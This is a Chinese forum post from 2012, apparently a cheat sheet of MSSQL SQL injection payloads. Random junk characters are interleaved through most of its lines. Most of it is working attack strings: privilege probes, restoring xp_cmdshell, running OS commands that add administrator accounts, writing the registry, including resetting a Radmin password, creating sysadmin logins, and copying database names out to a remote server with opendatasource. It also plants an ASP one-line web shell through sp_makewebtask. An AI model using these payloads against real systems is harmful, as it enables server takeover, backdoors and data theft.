//看看是什么权限的) w y: o7 \' @* P
and 1=(Select IS_MEMBER('db_owner'))- ]# q0 s. I5 V. J1 H9 v+ W
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--, v2 \0 F; M$ I! k% Z" B
1 Y5 }7 x& x2 Q0 H' I v
//检测是否有读取某数据库的权限
: r1 Q* z1 x4 z7 @. x" [and 1= (Select HAS_DBACCESS('master'))
# S! W3 g( W, CAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
2 a. J: C/ c' h% }2 D: W5 t. L2 X5 x% s; ]' v
4 u8 ^4 f" y5 q. t9 K m+ b, U数字类型
R/ f+ E' Q% A! ]: jand char(124)%2Buser%2Bchar(124)=0 @+ B/ q% g. T5 _# o
6 q6 G2 [$ o6 F* f" M1 P字符类型 q+ I, g9 A! X, \
' and char(124)%2Buser%2Bchar(124)=0 and ''=': W5 |) i& U! X+ W7 y! E
2 A) c' K. Z' B/ t9 c搜索类型3 f6 Z1 i& \0 V$ X! s' |4 C
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
E% n) o* @/ n( r; e$ `3 {
4 m' o. j, ?7 p2 `3 W爆用户名( w& @2 u4 m# E( x- R, @* P9 _) u, }
and user>0& T ~! u+ V1 @1 U& Q% u/ W
' and user>0 and ''='+ ^8 y5 b5 r- |9 c, _0 q
) o& Z d: \5 \: L+ g0 j, d检测是否为SA权限9 |1 d: h& ?, X* t! @
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
9 c& r; H9 o) f. s( u% GAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
& j5 w" p) R2 y* ~2 L6 M9 ~1 Y1 R, a6 g8 n4 z' J9 I
检测是不是MSSQL数据库 `3 {9 ~( g/ d/ t+ `
and exists (select * from sysobjects);--, J4 I$ _1 I( o
- C& t1 ]! S( S* Q B; v检测是否支持多行0 M( U" F7 W8 K6 {8 X
;declare @d int;--0 s; C, ~+ H% d. P5 s# }
2 d) m# i( Q; e9 ? g* _1 O! @% O
恢复 xp_cmdshell* z/ H1 R! l# E/ _. v
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--% X2 z% ^0 T* S5 F( Q' M8 f
Z7 Y8 n; X; p9 F. C0 F5 e. ?2 }& f5 l. U+ `* d8 a
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
3 z6 t/ C8 {6 P; `( i% v# Z! M5 r0 ]$ Z- A0 L7 |) Y# R2 S' J9 D6 `
//-----------------------# e' f8 R+ `9 p ?, r/ k. ?
// 执行命令
9 O$ B$ d& b% u' @/ n//-----------------------
1 U6 Y3 r2 R. T6 Y8 s x4 H首先开启沙盘模式: x+ F: H4 B8 B& r4 Z% H, e5 P
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
$ e5 J# f2 r% e. g
& D- y* y7 ?- a% p然后利用jet.oledb执行系统命令" Z J* s% y: G( M D0 `) G. H: k
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
* U& V. p9 t0 S& s
# v+ W8 Q( Q/ E( [* ]执行命令1 H$ L$ E- C7 s: W- o2 H
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--# T7 ?0 T' x+ }. T
, V/ X2 Y8 C; ?7 a3 z; X" ?
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'7 q$ B9 ?" c( a" g/ z
: C. p+ `: @* }& h, A: x
判断xp_cmdshell扩展存储过程是否存在:7 U; Q9 [) h5 l, H, ^' @/ B2 c5 h
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')9 ~, ~9 {; L8 G _0 i7 H9 O
Q0 Q( _0 r* N+ Z6 S7 S7 O. F写注册表5 L% I3 A3 N+ X% u" C/ d
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1. ]7 g {) c" J" a( o; {% [! Q
% j' v; v3 A- v* ^- [5 p+ _REG_SZ
* t0 Z# M0 i4 ^+ o" U8 _# R' w
* c! ]# m2 y9 P% S- j) ]; u5 Z' a读注册表
6 b& J: E9 [' B8 E8 M$ G9 c; sexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
4 v7 E. p, |. S1 t' |6 N8 T9 ]$ q5 q. v/ w* N0 f, T1 o
读取目录内容
- I# K" U$ Z: d6 e4 mexec master..xp_dirtree 'c:\winnt\system32\',1,1- O/ W% x$ r( M+ y
& X& e( [. n. D5 N
9 J# c% ?+ l( e- O2 J+ f
数据库备份
' {3 w" W( O0 |' p% M# Mbackup database pubs to disk = 'c:\123.bak'
- S; I& Q2 Q/ u1 t! i$ K" [% L$ p- S& H5 e, j# v8 [! y$ O
//爆出长度/ G( R+ T6 b" L
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
/ O2 Y- l' Y& _( [+ R
2 \+ O( Z/ n' M$ Z9 u, b& `
3 X- S6 C+ o5 [8 t2 o: A
# x4 ^2 q$ G+ B- m D, k# b更改sa口令方法:用sql综合利用工具连接后,执行命令:
( r( Z j2 t: g" p6 H/ K3 ^1 @exec sp_password NULL,'新密码','sa') W6 Q. i! f3 ^, `
- a" |# Q7 C: u* n+ p; Y3 c' n添加和删除一个SA权限的用户test:) o8 c2 y B+ m$ D8 v' |* X6 u+ f
exec master.dbo.sp_addlogin test,9530772; \( Z3 e+ c/ v9 ~. v$ n8 C2 l
exec master.dbo.sp_addsrvrolemember test,sysadmin
5 M' y6 X& A9 ]; K! I+ C- q+ c1 Q' c0 M' p3 `" j) O0 w, ]
删除扩展存储过过程xp_cmdshell的语句:% Z3 u: ^- o* O$ H8 A. f
exec sp_dropextendedproc 'xp_cmdshell'$ c& k, _5 r5 k! V, O* G
8 U( B3 }0 s8 i8 T) D
添加扩展存储过过程+ ]% I8 h" w+ Q: @( i
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
6 f& ]/ Q, h+ g* P: S, HGRANT exec On xp_proxiedadata TO public
3 o: @9 K4 {: G2 c7 a- T' p H/ R9 t* g+ J3 P8 {) M8 K
+ ]& x$ n! C" \+ K0 m
停掉或激活某个服务。
+ X9 F# \8 _6 N5 ?) W8 w2 h% ^9 I3 i5 |
exec master..xp_servicecontrol 'stop','schedule'& C4 Y0 N& e1 f' ^8 M9 `+ k
exec master..xp_servicecontrol 'start','schedule'
' A: d8 N( F$ F5 `& F, k; `/ M& @) F" w
dbo.xp_subdirs: D' R1 H S6 R, m7 Q1 l4 e$ F: {' T
* f3 M& I: X! w4 K E只列某个目录下的子目录。
# I- O- n' m8 u |xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
; r& _5 _8 z5 y& k7 s! Q# G1 \% W# x' d) W
dbo.xp_makecab8 `( d" k+ V3 J$ K( v
) N$ ^* A4 }& X/ Y" q; m将目标多个档案压缩到某个目标档案之内。+ o* ^, y) b: J) R7 u1 X* D+ ~2 F
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
! j# t7 [2 t, C8 [! [% |: g0 \, j2 W! _; x: m, B- y
dbo.xp_makecab
. W3 ` S9 |1 ^1 d& i2 _'c:\test.cab','mszip',1,
# {+ U6 D- B5 i' U3 L0 [2 ]'C:\Inetpub\wwwroot\SQLInject\login.asp',% o+ _7 D1 E7 c# }* B
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'- |1 ^- R- Z9 Q$ M8 i" O5 P
: F' a* q& K8 n: b4 r; O) bxp_terminate_process2 [& _* [5 q" c2 F; c3 ~
1 k3 k: q3 E: w) T停掉某个执行中的程序,但赋予的参数是 Process ID。
0 r8 I7 _3 p# Q3 ?+ K利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
+ D. \3 J8 c1 |% z8 L! E8 u3 Y% U! _: u+ X) K
xp_terminate_process 24847 e% M2 k4 }9 `) r$ {- A
( q. K( [0 n; a2 m1 u0 Q) b
xp_unpackcab: b! o% V: E3 N
' U* ~5 q6 ~( H6 E1 P解开压缩档。
/ L N: s0 f% k. |/ {5 Y/ q
# ~8 n0 n" B; r4 R+ ?xp_unpackcab 'c:\test.cab','c:\temp',1! [/ ?- B3 {; G" Y, I/ p0 o. `
! S6 w, D" j/ S. v: ]) a2 s
/ E5 _; w, w5 s7 z: ^某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
9 n4 j: y4 Z7 Y% A5 f: i! y' E5 Q+ k) B+ p4 r. a
create database lcx;
# K( L( |, B) Q7 b p% j% HCreate TABLE ku(name nvarchar(256) null);& R. i8 X! z) F- D# i0 r
Create TABLE biao(id int NULL,name nvarchar(256) null);
& }0 v* W7 A6 ?# W/ i% W1 F& V/ E: S- B" n% O8 {! Q; K
//得到数据库名$ q# d. f) N- s. B% f
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
! {+ W* d' n% Q4 U* p8 N" z2 b* C4 H' N( |% U% K. u
8 `5 \7 h( v% u) e7 y//在Master中创建表,看看权限怎样* `& s; K3 L6 J& S' Z
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--6 \ h2 J- n1 Y
; p, @% t! v' X# [; p
用 sp_makewebtask直接在web目录里写入一句话马:0 Y- @ M; L; p; o# v/ _ Y2 X
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--: A. _' \2 v, t, L% i- m
% J: R8 V& a( p
//更新表内容5 x% f) j' `- R# |. {- J
Update films SET kind = 'Dramatic' Where id = 123% _( u% o& ?3 p3 ?, m9 D
& U0 r, A/ j) q1 S! E//删除内容$ g3 ]& i+ X& B$ v# K
delete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对